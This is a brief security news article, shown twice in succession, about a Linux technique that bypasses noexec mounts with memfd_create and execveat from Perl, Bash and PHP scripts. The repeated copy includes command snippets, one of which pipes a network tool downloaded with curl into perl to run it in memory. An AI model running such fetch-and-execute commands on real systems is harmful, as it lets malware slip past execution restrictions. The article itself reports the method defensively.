A method of bypassing protection through ordinary scripts has been revealed.
Researchers have discovered a new way to bypass the noexec flag in Linux, allowing arbitrary binaries to be executed even on partitions where execution is prohibited. This is possible with Perl, Bash and PHP scripts, which do not require root rights and allow you to download and execute binaries directly from the Internet, bypassing noexec restrictions.
One of the key aspects is that the binary does not have to be marked as executable (+x) and can be on a partition with the noexec flag set. This is especially useful for situations where all writable partitions are mounted with the -o noexec option, including /dev/shm. The method works even in environments where PHP has restrictions on the use of 'exec' functions.
The solution is based on injecting shellcode into a running process using memfd_create and execveat system calls, which allows you to load a binary file from memory. As the researchers note, this workaround also works in environments where system calls are not allowed in Bash and PHP, using an updated method to bypass these restrictions.
The Perl example shows how you can execute the 'id' command without rooting:
On Bash, this can be done in the following way:
An interesting feature of the method is the ability to load binary files directly from the Internet into RAM and execute them despite the activation of execution restrictions (noexec). This can be used by attackers to download and execute malware silently via commands like:
The method allows you to effectively bypass restrictions on the execution of commands in PHP using similar scripts, which is a serious vulnerability for systems that use such restrictions to protect against malicious code.
The researchers continue to analyze the approach and its possible implications for the security of Linux systems, emphasizing the importance of implementing additional security measures to prevent the use of such a method in real-world attacks. We also recommend that you check access to system calls and limit their use, especially in security-sensitive environments.
Source
Researchers have discovered a new way to bypass the noexec flag in Linux, allowing arbitrary binaries to be executed even on partitions where execution is prohibited. This is possible with Perl, Bash and PHP scripts, which do not require root rights and allow you to download and execute binaries directly from the Internet, bypassing noexec restrictions.
One of the key aspects is that the binary does not have to be marked as executable (+x) and can be on a partition with the noexec flag set. This is especially useful for situations where all writable partitions are mounted with the -o noexec option, including /dev/shm. The method works even in environments where PHP has restrictions on the use of 'exec' functions.
The solution is based on injecting shellcode into a running process using memfd_create and execveat system calls, which allows you to load a binary file from memory. As the researchers note, this workaround also works in environments where system calls are not allowed in Bash and PHP, using an updated method to bypass these restrictions.
The Perl example shows how you can execute the 'id' command without rooting:
Code:
source memexec-perl.sh
cat /usr/bin/id | memexec -uOn Bash, this can be done in the following way:
Code:
source memexec-bash.sh
cat /usr/bin/id | memexecAn interesting feature of the method is the ability to load binary files directly from the Internet into RAM and execute them despite the activation of execution restrictions (noexec). This can be used by attackers to download and execute malware silently via commands like:
Code:
curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-x86_64 | perl -efor(319,279){...}The method allows you to effectively bypass restrictions on the execution of commands in PHP using similar scripts, which is a serious vulnerability for systems that use such restrictions to protect against malicious code.
The researchers continue to analyze the approach and its possible implications for the security of Linux systems, emphasizing the importance of implementing additional security measures to prevent the use of such a method in real-world attacks. We also recommend that you check access to system calls and limit their use, especially in security-sensitive environments.
Source
